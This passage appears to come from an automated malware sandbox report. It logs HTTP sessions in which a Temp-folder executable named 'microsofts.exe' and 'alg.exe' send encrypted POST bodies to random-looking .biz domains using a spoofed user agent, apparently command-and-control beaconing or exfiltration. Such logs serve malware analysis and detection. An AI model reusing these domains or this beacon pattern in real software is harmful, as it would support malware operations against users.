                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.155771017 CET352OUTPOST /knaxcyr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.155771017 CET828OUTData Raw: 06 4c a7 c3 dc 77 60 27 30 03 00 00 c1 dd 0c bc b6 df 8a 03 4d b7 35 eb 9a 4e d5 60 0c 64 24 72 82 3d 2d ed e4 f4 11 c3 06 37 62 03 b0 94 c3 36 a8 b5 aa 8d 10 3d 67 d9 4f 3a 69 4f 1f a2 33 9e 64 2a 99 13 12 f4 ad e1 55 8c c6 16 ed 1e 9d 59 09 66
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Lw`'0M5N`d$r=-7b6=gO:iO3d*UYfUt@[]_m_\4oh:=Y.[ex9NU9LZ%HBUKG5gTy76We{5OUD%:\a`yu~0g}
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.824342012 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=2c91d364c7dde500cd0c22f9d75e5c49|173.254.250.76|1730822662|1730822662|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              117192.168.2.55979018.246.231.120801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.847208023 CET353OUTPOST /ivdmudcsfvhy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.847224951 CET828OUTData Raw: 8b 01 91 78 b1 29 82 a8 30 03 00 00 35 ed 6d be 67 dd aa 6b df 37 3b 2a 89 dd 7d 1d 0f 07 a4 30 5c ca ff 6c bb f0 39 08 13 87 ca a6 f5 ec 51 67 ec b9 53 7e 1f 0f 5c ad b8 14 86 af 90 1f c3 6b 65 83 ea e3 30 dd 58 fd be d8 4f 2f 95 49 7a 03 b8 f2
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: x)05mgk7;*}0\l9QgS~\ke0XO/Iz:e)CbuMY,Tx)X4Xl8k]" sk1|.=}E>LG)U[9"{6]vy5/eq+8kq_qoIoD*
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.684005976 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9ea734ac212b8968377cb7bdba6aa724|173.254.250.76|1730822663|1730822663|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              118192.168.2.5597913.254.94.185801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880805969 CET355OUTPOST /ydpeotimwcfnew HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.880831003 CET778OUTData Raw: d9 66 53 c2 02 04 69 eb fe 02 00 00 51 b8 99 9a d7 e3 fd f1 49 b0 25 d6 a5 60 77 e1 8b 3f 5b ba 0c 51 22 45 0a 5b fe 51 4e c9 f9 2c ff 95 b6 b5 4c 4e 47 90 87 8c ce 01 53 bc b1 f2 49 a2 9e 38 d8 d3 0d 6a bd 2b e2 54 d8 75 56 6d 58 cf 7b 2e 06 08
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: fSiQI%`w?[Q"E[QN,LNGSI8j+TuVmX{.dyi;ONiH9z82+|L.$>pMLs+idLN-DM.JQF/%n|/n&FA/)DV=&39U]eW={9"Q-'-RhIU[d/
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.848691940 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1dcba9b99a788c42e12d3cfc530eb1ce|173.254.250.76|1730822663|1730822663|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              119192.168.2.55979244.221.84.105801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.716886997 CET350OUTPOST /tssrdd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.716886997 CET828OUTData Raw: 65 ee d5 0c 58 91 ba 2c 30 03 00 00 d2 02 ae 07 04 47 d6 15 f3 ac ee f5 9d fe a9 6f 92 b4 8c e1 36 e3 bb ab ad 1b b7 f5 46 42 3a 59 7a 08 7d 14 88 1f 67 3d 19 82 d4 4b 6d 64 a2 64 55 9c 63 26 e0 ce 26 4a 16 dd 5b 84 00 e5 2f 2b 8c 93 b9 64 51 ef
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: eX,0Go6FB:Yz}g=KmddUc&&J[/+dQGnUD=jnE6`*uh|A"eBpspQ8,ZsgJuJ+vB|E8j>tm5M,Z/KAv1j:M[
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.368329048 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=19a0b567a2753f447df06dd9f6812a37|173.254.250.76|1730822664|1730822664|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              120192.168.2.55979318.141.10.107801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.188321114 CET357OUTPOST /nhvixgstciqyn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.188321114 CET778OUTData Raw: e1 62 91 1d a4 3c da fd fe 02 00 00 82 a9 ee f4 76 a9 d7 66 e3 e3 37 39 51 88 fc 80 2e 8d 8f 6d 12 f2 04 7f e3 2e 3f 03 f3 86 71 4b 2a f0 7f 67 cf dd b5 4b 96 dc c7 e3 49 b6 dd d3 a8 ce f4 c1 db 88 73 7a 6d 41 4b 95 22 b8 56 d9 27 08 de 92 33 27
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: b<vf79Q.m.?qK*gKIszmAK"V'3'OToDdL/~zj-#L'AFm"[R'K'W7jAI rg;rR6h\g$0'_!eEx=HVwKK8XklPqY=
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.618566036 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=64d8616bada04f9cb183e2132bfc4534|173.254.250.76|1730822665|1730822665|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              121192.168.2.55979454.244.188.177801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.563165903 CET351OUTPOST /lameuyxyl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.563256979 CET828OUTData Raw: 58 d4 5c 7b e7 7a af f3 30 03 00 00 d1 df 1a cc 0f 88 0f d0 16 5c 44 35 9b d9 34 f2 45 a2 8e 98 75 d3 ca a9 04 07 a5 0f c2 84 1b ae 03 e1 37 3e c6 10 2c e6 42 9d a0 fb a6 2f 37 fc aa 13 49 20 81 f2 a7 4b 77 7c 45 ce 92 be 28 03 97 9c da 47 03 57
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: X\{z0\D54Eu7>,B/7I Kw|E(GW;x]TY%wFmCXer^`6wNu sieLWwh*v>30m;#~/>%Z_\D\AL9sIzzC8;G6(qBEQg2b&won~klC{mE
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.399157047 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5655fddbe187add045d59ab0b0ff25f6|173.254.250.76|1730822665|1730822665|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              122192.168.2.5597953.254.94.185801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.435960054 CET354OUTPOST /qcgjfxceqsgou HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.435997963 CET828OUTData Raw: bc 74 45 d6 45 ff 6f 3b 30 03 00 00 a1 0c f3 f6 d5 f8 81 bb c3 49 79 f2 d1 d0 69 ee 8b 7e ae d0 4a 3a 63 08 d3 a8 cd 7a 38 3b c9 10 a3 a5 fe 07 be 8d 77 1b 72 ff d8 2f e4 1d fe d4 2d 4d 5e c2 da 1b 9c 4b 99 09 68 19 ab 94 8f d3 b4 f1 7c 9f 74 a0
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tEEo;0Iyi~J:cz8;wr/-M^Kh|tBKqu'vXf?RRE]a^@#9 <LX/"p<.*076tQ:nP'X:8gn|IK7}g@`'{NqKY
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.437732935 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f99f5331876d321b7f9964f8d48b2830|173.254.250.76|1730822666|1730822666|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              123192.168.2.55979634.246.200.160801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.953444958 CET351OUTPOST /tfuhaffhj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.953444958 CET778OUTData Raw: 7f 39 4a 4b dd d8 80 ac fe 02 00 00 88 48 d8 10 73 90 16 05 e0 93 bc 2e d7 51 49 02 00 41 9c 2a a3 29 a6 12 09 02 b1 ec 7f 24 cc 78 c7 80 b4 43 c1 a1 d9 c2 3d 60 9b b9 94 b0 06 7f 25 4d 4c dc 03 5b 2e 67 fd 4d 00 15 cd 8b b2 5b bc 51 e3 9b 74 24
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 9JKHs.QIA*)$xC=`%ML[.gM[Qt$R!$M0dH[ni}Dbq`Kw"U$Kx!H5P3Jw4`yo=:\2*HCh<r8FDRJZ+~~~
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.924432039 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=fe1ecc6c3d60dc0c4d30c425d779fbc2|173.254.250.76|1730822666|1730822666|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              124192.168.2.55979718.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.463238955 CET346OUTPOST /fx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.463326931 CET828OUTData Raw: d1 f0 a0 54 22 6b 21 3a 30 03 00 00 c2 76 28 27 b3 86 0a 25 9e e0 d2 94 22 35 11 c2 9c f6 d4 38 36 87 ed 24 7a 0e ac 4f 3a 1c bc 00 36 81 50 49 fe 85 93 0e f9 2e e8 06 4e d8 e5 36 ef 92 1e e8 21 ec 7c 32 ce df 38 d8 b0 03 b6 6f 3b d2 2b 04 42 ad
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: T"k!:0v('%"586$zO:6PI.N6!|28o;+BnEOFY]Ps.\2XnV%fAc|,=pl9$sJiZH[6uhe9yl6w'^K=C{w/#S=l'W(*cEgD
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.953049898 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=56030c0a05205bef4a83c2da70f6becb|173.254.250.76|1730822667|1730822667|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              125192.168.2.55979947.129.31.212801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.307653904 CET351OUTPOST /tmdyfv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.307653904 CET778OUTData Raw: 51 57 03 7b 8e 12 bd cb fe 02 00 00 7f cb 18 52 92 a6 0a cd 4c bc 7d e3 4c 7b b0 a6 24 cb 62 eb 1a 69 84 37 b9 a3 02 e5 90 9c 02 af 3f 3e df b2 ee 8b f0 c4 0b f3 bd 00 83 27 51 47 e8 4c 1a f6 d0 5e 8b 8a 9d ee bf 4c ae 29 56 f5 bf 4c 91 d2 05 df
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: QW{RL}L{$bi7?>'QGL^L)VLiuR;.`+"8 i&AcYY;~r*c[+rDt[oJ{P*bsmV0MUm8Ht~$Ks-$.Wc^x>WW=?26y[kf{
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.759972095 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=41ec5cac6ced2d29e82b0974df9ccda7|173.254.250.76|1730822668|1730822668|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


